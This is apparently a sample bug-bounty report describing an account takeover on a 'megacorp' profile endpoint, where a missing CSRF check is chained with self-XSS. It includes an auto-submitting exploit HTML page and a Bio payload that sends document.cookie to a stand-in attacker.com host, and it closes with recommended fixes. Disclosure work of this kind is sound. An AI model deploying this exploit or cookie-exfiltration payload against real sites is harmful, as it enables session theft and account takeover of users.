HIGH (8.8)
Account Takeover via CSRF chained with Self-XSS on Profile Update
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1. Description
I have identified a vulnerability chain that allows an attacker to take over any user account by tricking them into visiting a malicious website.
The core issue is that the /api/update_profile endpoint lacks CSRF protection. While the application filters standard XSS, it allows "Self-XSS" in the Bio field. By chaining CSRF to inject a payload into the victim's own profile, I can turn unexploitable Self-XSS into a full Account Takeover.
2. Technical Details
Vulnerable Request (CSRF):
The following POST request updates the user's profile without checking for a CSRF token or Referer header:
POST /api/update_profile HTTP/2
Host: profile.megacorp.com
Cookie: session=victim_session_id
Content-Type: application/x-www-form-urlencoded
fullname=Victim&bio=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&csrf_token=
Vulnerability Analysis:
- No CSRF Token: The server accepts the request even if the
csrf_tokenparameter is empty or missing. - No Sanitization: The
bioparameter accepts raw HTML/JavaScript tags.
3. Proof of Concept (Exploit)
To reproduce this vulnerability, an attacker hosts the following HTML file and sends the link to a logged-in victim.
<!-- exploit.html -->
<html>
<body>
<h1>Please wait...</h1>
<form action="https://profile.megacorp.com/api/update_profile" method="POST">
<input type="hidden" name="fullname" value="Hacked Account">
<!-- Malicious Payload to Steal Cookies -->
<input type="hidden" name="bio" value="<script>fetch('https://attacker.com/log?c='+document.cookie)</script>">
<input type="submit" value="Click me">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Steps to Reproduce:
- Log in to the application as a Victim.
- Open the
exploit.htmlfile in the same browser (simulating a phishing link). - The page will auto-submit the form to
profile.megacorp.com. - Navigate back to the Victim's profile page.
- Result: The XSS payload executes, sending the Victim's session cookie to the Attacker's server.
4. Impact Analysis
Business Impact:
This vulnerability leads to full Account Takeover (ATO). An attacker can compromise high-value accounts (including Admins) simply by sending a link. Once cookies are stolen, the attacker can:
This vulnerability leads to full Account Takeover (ATO). An attacker can compromise high-value accounts (including Admins) simply by sending a link. Once cookies are stolen, the attacker can:
- Access sensitive PII (Personally Identifiable Information).
- Perform unauthorized financial transactions.
- Delete the user's account or data.
5. Recommended Fix
We recommend a two-layered approach:
- Implement Anti-CSRF Tokens: Ensure all state-changing requests (POST/PUT/DELETE) require a valid, unpredictable token that is verified on the server.
- Sanitize Input: Use a library like DOMPurify to sanitize the
biofield and encode HTML characters before rendering them.
Report generated for educational purposes.
0 Comments